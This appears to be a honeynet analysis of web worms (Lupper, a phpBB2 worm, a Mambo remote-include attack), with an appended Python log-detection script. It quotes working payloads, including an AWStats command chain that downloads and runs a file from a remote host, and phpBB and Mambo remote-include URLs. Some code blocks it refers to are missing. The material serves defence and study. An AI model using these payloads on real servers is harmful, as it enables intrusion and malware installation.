(Please note that the IP addresses and domains have been obfuscated throughout this paper.)

Certain versions of the awstats program would execute the code "echo%20YYY;cd%20%2ftmp%3bwget%20192%2e168%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;" in response to this request. This would cause the file at '192.168.1.216/nikons' to be downloaded and stored in the /tmp directory. The file would then be made executable using 'chmod +x nikons' and finally executed.

This file 'nikons' was a shell script which attempted to download two programs: an IRC bot, identified as Tsunami.A, and a variant of the Lupper worm. The Lupper variant tried to spread by scanning for hosts listening on port 80 and attempting to exploit the AWStats and PHPXMLRPC vulnerabilities. (Another Lupper variant is described as trying to exploit a file called hints.pl; this behavior was not present in our captured version.)

The bash script 'nikons', which downloads and executes two files from a webserver.

The worm probed for the following scripts: /xmlrpc/xmlrpc.php, /wordpress/xmlrpc.php, /phpgroupware/xmlrpc.php, /drupal/xmlrpc.php, /blogs/xmlsrv/xmlrpc.php, /blog/xmlsrv/xmlrpc.php, /blog/xmlrpc.php.
If present, any of these scripts would have been exploited via the following PHPXMLRPC exploit. The following POST payload downloads the tool "gicuji", a shell script that downloads and executes the Lupper and Tsunami binaries.

The PHPBB Worm

This section exhibits example logs created by a worm exploiting a remote code execution vulnerability within phpBB2. The exploit was sent in the value of the "highlight" parameter of the application's viewtopic.php script. Accessing the following URL downloaded the file root.txt from the domain example.com:

/phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://example.com/root.txt?&

The worm checks whether the PHPBB installation is vulnerable by fetching the following URL, which attempts to print "jSVowMsd" in the output. If it finds "jSVowMsd" in the requested page, that is, if the vulnerability is present in the application, the targeted PHP server will then run the next two commands.

The GET request is an attempt to exploit a Mambo remote file-include vulnerability to execute http://66.98.a.a/cmd.txt on the victim host. Despite the extension .txt, the URL specifies a PHP script rather than a text file. The vulnerable code in Mambo is as follows:

This simply includes the file the attacker wants and ignores the filename after the '?' character. The included code then attempts to execute the operating system commands specified by the cmd= parameter in the original HTTP request. (Successful exploitation of this vulnerability requires the allow_url_fopen configuration directive to be on.) The Philippine Honeynet Project has analysed an incident in which this script 'cmd.txt' appears: ""Defacing Tool 2.0 by r3v3ng4ns" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface web sites." In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands and searching for files. This will only be an issue if the web server allows the upload of PHP scripts to the web root. The command that was parsed out is as follows:

The behavior of this script was studied on a virtual machine. The script downloaded and executed another Perl program, the IRC bot variant PERL/Shellbot. This joined a particular IRC channel and waited for commands.
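The request patterns described in this section (the URL-encoded awstats command chain, the xmlrpc.php probes, the double-encoded phpBB "highlight" value and the Mambo remote include with cmd=) can be flagged in web server logs. The following is an added example, not part of the original paper: the request URIs are constructed around the payloads quoted above, and the parameter names "param" and "path", the /cgi-bin/ path and the rule names are assumptions.

```python
import re
from urllib.parse import unquote
# Script paths the text lists as probed by the Lupper variant.
XMLRPC_PATHS = {
    "/xmlrpc/xmlrpc.php", "/wordpress/xmlrpc.php", "/phpgroupware/xmlrpc.php",
    "/drupal/xmlrpc.php", "/blogs/xmlsrv/xmlrpc.php", "/blog/xmlsrv/xmlrpc.php",
    "/blog/xmlrpc.php",
}
RULES = [
    # Download-then-run chain, e.g. "wget host/file;chmod +x file;./file".
    ("shell-download-chain",
     re.compile(r"\b(wget|curl)\b.*[;|&].*(chmod\s+\+x|\./\w)", re.I)),
    # A quote breaking out of the highlight value, followed by PHP code.
    ("phpbb-highlight-injection",
     re.compile(r"[?&]highlight=[^&]*'[^&]*(include|system|\$_GET)", re.I)),
    # A parameter whose value is a remote URL, sent together with cmd=.
    ("remote-include-with-cmd",
     re.compile(r"[?&]\w+=(https?|ftp)://[^&]*&cmd=", re.I)),
]
# Constructed request URIs. The payloads are the ones quoted in the text;
# "param" and "path" are placeholder parameter names, not taken from it.
SAMPLES = {
    "awstats": "/cgi-bin/awstats.pl?param=echo%20YYY;cd%20%2ftmp%3bwget%20"
               "192%2e168%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b"
               "%2e%2fnikons;echo%20YYY;",
    "phpbb": "/phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster="
             "include($_GET[m]).%2527&m=http://example.com/root.txt?&",
    "mambo": "/index.php?path=http://66.98.a.a/cmd.txt?&cmd=id",
    "xmlrpc": "/blog/xmlrpc.php", "benign": "/index.php?option=com_content&id=5",
}

def fully_decode(uri, max_rounds=5):
    """URL-decode until stable: %2527 -> %27 -> ' takes two passes."""
    for _ in range(max_rounds):
        uri, previous = unquote(uri), uri
        if uri == previous:
            break
    return uri

def classify(request_uri):
    """Return the sorted names of all rules that match one request URI."""
    uri = fully_decode(request_uri)
    hits = {name for name, rx in RULES if rx.search(uri)}
    if uri.split("?", 1)[0].lower() in XMLRPC_PATHS:
        hits.add("xmlrpc-probe")
    return sorted(hits)
if __name__ == "__main__":
    for label, uri in SAMPLES.items():
        print(f"{label:8} {classify(uri)}")
```

A single decoding pass leaves the phpBB value as %27, so a rule that looks for a literal quote only matches after the second pass. The xmlrpc-probe rule is most useful on hosts that do not run any of the listed applications, where a request for those paths has no legitimate cause.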